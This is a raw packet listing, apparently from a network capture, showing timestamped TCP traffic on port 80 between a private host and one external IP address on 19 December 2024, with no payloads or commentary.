Dec 19, 2024 08:47:36.975599051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.975989103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.976176023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.976339102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.976790905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.976808071 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.976871014 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.977549076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.977744102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.977905035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.978351116 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.978564024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.979165077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.979255915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.979887962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.980032921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.980545998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.980562925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.980611086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.980799913 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.981075048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.981209993 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.981503963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.982114077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.982191086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.982388973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.982407093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.982472897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.983159065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.983941078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.984006882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.984065056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.984091043 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.984146118 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.984647036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.984853983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.984972954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.985455990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.985636950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.985697985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.986239910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.986450911 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.986507893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.987052917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.987241983 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:36.987303019 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:36.987822056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.028405905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.140117884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.140373945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.140428066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.140630007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.140975952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.141040087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.141330004 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.141666889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.141762972 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.151918888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.152080059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.152091026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.152169943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.152765036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.152781963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.152939081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.153547049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.153564930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.153654099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.154329062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.154342890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.154393911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.155102015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.155112028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.155191898 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.155886889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.155898094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.155914068 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.155982018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.155982018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.156701088 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.156712055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.156769037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.157452106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.157461882 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.157535076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.158159971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.158169985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.158231020 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.158931971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.158951044 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.158960104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.159008980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.159744978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.159765005 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.159970045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.160504103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.160512924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.160566092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.161277056 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.161287069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.161328077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.162071943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.162081957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.162157059 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.162821054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.162837029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.162844896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.162868977 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.162904024 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.163605928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.163615942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.163690090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.164388895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.164397955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.164597988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.165146112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.165154934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.165307045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.165925980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.165935993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.165951967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.165992975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.166697025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.166707993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.166811943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.167506933 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.167517900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.167607069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.168241978 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.168251991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.168298006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.169022083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.169032097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.169079065 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.169785976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.169795990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.169805050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.169867039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.170577049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.170587063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.170665026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.171350956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.171360016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.171412945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.172156096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.172167063 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.172215939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.172889948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.172899961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.172907114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.172944069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.173710108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.173729897 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.173798084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.174436092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.174447060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.174536943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.175229073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.175245047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.175323963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.175973892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.176012039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.176078081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.176770926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.176789999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.176798105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.176853895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.176853895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.177551031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.177560091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.177639008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.178319931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.178329945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.178397894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.179080009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.179090023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.179178953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.179850101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.179866076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.179933071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.180736065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.180744886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.180752993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.180824995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.181421995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.181432009 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.181477070 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.182190895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.182199955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.182302952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.182964087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.182974100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.183043003 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.183883905 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.183893919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.183902025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.183937073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.184017897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.184540033 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.184551001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.184614897 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.185492039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.185509920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.185580015 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.186299086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.186311007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.186316967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.186366081 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.231713057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.332545042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.332881927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.332891941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.332952976 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.333383083 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.333429098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.333765030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.333775043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.334012032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.334445000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.334786892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.334856987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.335208893 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.335439920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.335491896 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.336052895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.336064100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.336200953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.336800098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.337052107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.337151051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.337676048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.337927103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.337989092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.338458061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.338629961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.338700056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.339147091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.339574099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.339642048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.339936018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.340136051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.340248108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.340717077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.340908051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.340961933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.341526031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.342097998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.342343092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.342350006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.342360020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.342401028 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.343122959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.343333960 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.343399048 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.343902111 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.344089985 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.344156981 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.344707966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.344928026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.345071077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.345628977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.346015930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.346136093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.346334934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.346590996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.346676111 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.347130060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.347302914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.347351074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.347865105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.348124027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.348196030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.348805904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.348964930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.349036932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.349433899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.350003958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.350073099 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.350227118 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.350553036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.350656033 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.351028919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.351229906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.351339102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.351845026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.351994991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.352042913 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.352669954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.352684021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.352749109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.353414059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.354191065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.354242086 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.354379892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.354389906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.354454041 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.355058908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.355411053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.355473042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.355777025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.356184959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.356257915 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.356599092 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.356812954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.356874943 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.357377052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.357578039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.357708931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.358144045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.358361006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.358408928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.358971119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.359179974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.359230042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.359734058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.359955072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.360030890 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.360511065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.360692024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.360743046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.361351967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.361538887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.361619949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.362143993 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.362323046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.362401009 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.362895012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.363110065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.363270998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.363713980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.363907099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.363965988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.364487886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.364711046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.364797115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.365262032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.365500927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.365572929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.366223097 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.366749048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.366791964 CET	49707	80	192.168.2.7	194.87.47.113
